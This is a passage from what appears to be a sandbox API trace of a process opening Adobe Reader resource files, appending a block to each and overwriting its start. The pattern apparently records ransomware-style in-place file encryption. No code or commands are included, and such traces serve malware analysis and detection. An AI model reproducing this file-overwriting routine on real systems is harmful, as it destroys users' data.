lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.362] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x37600 [0085.362] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.364] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x37600 [0085.364] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.365] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.365] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.365] CloseHandle (hObject=0x1fc) returned 1 [0085.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.367] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.367] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2a0 [0085.367] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.368] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.368] ReleaseMutex (hMutex=0x168) returned 1 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY______.PFM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY______.PFM", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY______.PFM", lpUsedDefaultChar=0x0) returned 12 [0085.368] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea68a8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea68a8*, lpNumberOfBytesRead=0x2b1f2bc*=0x2a0, lpOverlapped=0x0) returned 1 [0085.369] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0085.369] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x828, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x828, lpOverlapped=0x0) returned 1 [0085.370] CloseHandle (hObject=0x1fc) returned 1 [0085.370] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0085.372] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.372] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6c96 [0085.372] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.372] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.372] ReleaseMutex (hMutex=0x168) returned 1 [0085.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_BH.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_BH.txt", cchWideChar=30, lpMultiByteStr=0x1f8fc3c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_BH.txt", lpUsedDefaultChar=0x0) returned 30 [0085.373] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.375] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.376] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.376] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.376] WriteFile (in: hFile=0x1fc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.377] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.377] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.377] CloseHandle (hObject=0x1fc) returned 1 [0085.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.687] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.687] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6c96 [0085.687] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.687] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.687] ReleaseMutex (hMutex=0x168) returned 1 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_LY.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_LY.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_LY.txt", lpUsedDefaultChar=0x0) returned 30 [0085.687] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.690] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.690] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.691] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.691] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.692] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.692] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.692] CloseHandle (hObject=0x1d4) returned 1 [0085.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.693] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.693] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6c96 [0085.693] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.693] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.693] ReleaseMutex (hMutex=0x168) returned 1 [0085.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_YE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_YE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_YE.txt", lpUsedDefaultChar=0x0) returned 30 [0085.693] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.695] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.695] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.696] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5c96 [0085.696] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.697] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.697] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.697] CloseHandle (hObject=0x1d4) returned 1 [0085.697] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.698] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.698] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6d72 [0085.698] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.698] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.698] ReleaseMutex (hMutex=0x168) returned 1 [0085.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.da.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0085.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.da.txt", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.da.txt", lpUsedDefaultChar=0x0) returned 27 [0085.698] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.700] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5d72 [0085.700] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.701] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5d72 [0085.701] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.702] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.702] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.702] CloseHandle (hObject=0x1d4) returned 1 [0085.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.707] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.707] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e88 [0085.707] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.707] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.707] ReleaseMutex (hMutex=0x168) returned 1 [0085.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_CA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_CA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.en_CA.txt", lpUsedDefaultChar=0x0) returned 30 [0085.708] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.710] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e88 [0085.710] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.710] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e88 [0085.711] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.711] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.711] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.712] CloseHandle (hObject=0x1d4) returned 1 [0085.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_CL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_cl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.713] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.713] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6ec8 [0085.714] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.714] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.714] ReleaseMutex (hMutex=0x168) returned 1 [0085.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CL.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0085.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_CL.txt", cchWideChar=30, lpMultiByteStr=0x1f8fcfc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_CL.txt", lpUsedDefaultChar=0x0) returned 30 [0085.714] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.717] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0085.717] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.720] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5ec8 [0085.721] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.721] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0085.721] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.722] CloseHandle (hObject=0x1d4) returned 1 [0085.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_HN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_hn.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0085.723] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0085.723] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6ec8 [0085.723] 